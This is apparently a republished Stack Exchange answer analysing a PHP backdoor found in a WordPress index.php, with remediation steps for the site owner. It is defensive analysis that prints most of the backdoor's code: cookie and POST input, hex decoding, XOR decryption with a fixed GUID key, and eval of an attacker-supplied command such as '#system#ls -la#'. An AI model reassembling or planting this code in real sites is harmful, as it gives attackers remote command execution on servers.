You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

求助:WordPress站点未知疑似病毒代码功能解析

Analysis of the Malicious Backdoor Code

First off, this is a web backdoor—bad news, it’s designed to let an attacker run arbitrary code or commands on your WordPress server. Let’s break down exactly what it does, step by step:

1. Input Targeting

The code starts by looping through every value in both $_COOKIE and $_POST:

foreach (array_merge($_COOKIE, $_POST) as $key => $value) {

This means the attacker can trigger the backdoor either via a browser cookie or a POST request—flexible for them, dangerous for you.

2. Encryption Key Generation (fun1)

This function creates a repeating key string that matches the length of the encrypted input value:

function fun1($key, $valueLength) {
  $keyGuid = $key . "49d339b2-3813-478a-bfa1-1d75be92cf49";
  $repeatTimes = ($valueLength / strlen($key)) + 1;
  return substr(str_repeat($keyGuid, $repeatTimes), 0, $valueLength);
}

It appends a fixed GUID to the parameter’s key, repeats that combined string enough times, then cuts it to match the length of the encrypted value. This is the key used to decrypt the attacker’s payload.

3. Hex-to-Binary Conversion (packToHex)

function packToHex($inputToPack) {
  return @pack("H*", $inputToPack);
}

The attacker’s payload is sent as a hexadecimal string—this function converts that hex string back into raw binary data so it can be decrypted. The @ suppresses errors, so if the input isn’t valid hex, it won’t throw a visible error (hiding the backdoor’s presence).

4. Payload Decryption

The core of the backdoor uses XOR encryption (a simple, reversible method) to decode the attacker’s payload:

$value = packToHex($value);
$bitwiseXor = $value ^ fun1($key, strlen($value));

XOR works by flipping bits using the key—since XOR is its own inverse, encrypting a payload with this key would let the backdoor decrypt it here.

5. Code Execution (fun3)

Finally, the decrypted payload is split by # characters:

function fun3($exploded) {
  $modCount = count($exploded) % 3;
  if (!$modCount) {
    eval($exploded[1]($exploded[2]));
    exit();
  }
}

If the split results in a number of parts divisible by 3 (e.g., #system#ls -la#), it runs eval() on the second part called with the third part as an argument. In this example, that would execute system('ls -la')—giving the attacker full command-line access to your server. The exit() stops the rest of your WordPress site from loading, covering their tracks.

What About the .ico File?

That random .ico is almost certainly part of the attack. It’s likely either:

  • A disguised PHP script that the backdoor can load and execute (using something like #include#/path/to/malicious.ico#), or
  • A decoy to avoid detection by security scanners (since .ico files are often overlooked).

Next Steps to Secure Your Site

  • Immediately restore a clean backup of your index.php and any other tampered files.
  • Change all passwords: WordPress admin, FTP/SFTP, database, and server root accounts—use strong, unique passwords.
  • Scan for malware: Use a WordPress security plugin like Wordfence or Sucuri to scan your entire site for other hidden backdoors.
  • Check server logs: Look for unusual access patterns, like requests with strange cookies or POST parameters, to identify how the attacker got in.
  • Update everything: Make sure WordPress, themes, and plugins are fully patched—outdated software is a common entry point for attackers.

内容的提问来源于stack exchange,提问作者Mitch L

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.05.28 03:52:29